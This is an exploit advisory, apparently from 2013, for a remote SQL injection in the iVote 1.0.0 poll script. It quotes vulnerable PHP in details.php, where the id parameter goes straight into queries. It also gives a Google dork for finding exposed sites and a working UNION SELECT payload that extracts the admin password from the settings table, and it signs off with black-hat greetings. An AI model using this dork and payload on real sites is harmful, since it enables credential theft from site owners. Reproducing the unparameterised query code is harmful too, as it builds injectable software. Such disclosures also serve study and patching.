iVote version 1.0.0 suffers from a remote SQL injection vulnerability.
e92df3a9e230ad705c3cf0adc85407a1af9aa864677da01463fad9083153b548
# Exploit Title: iVot Sql Injection
# Google Dork: inurl:details.php?id=
# Date: 2013 July 11
# Exploit Author: Ashiyane Digital Security Team
# Software Link:
http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/
# Version: 1.0.0
# Tested on: Linux CentOS , Linux Ubunto , Windows 8
vulnerability : details.php on line 5
$id = $_GET['id'];
$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");
$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");
$row = mysql_fetch_array($select);
///////////////////////////////////////
Example : http://example.com/iVote/details.php?id=1 union select
1,password,3,4 from settings
///////////////////////
TNX : Rz04 & Crypt0
I Love Iran & all IRanian Black Hats :X
I'm , Bi Edea (R3za)
Email : momtane666@yahoo.com
Gmail : kafaran.blackhats@Gmail.com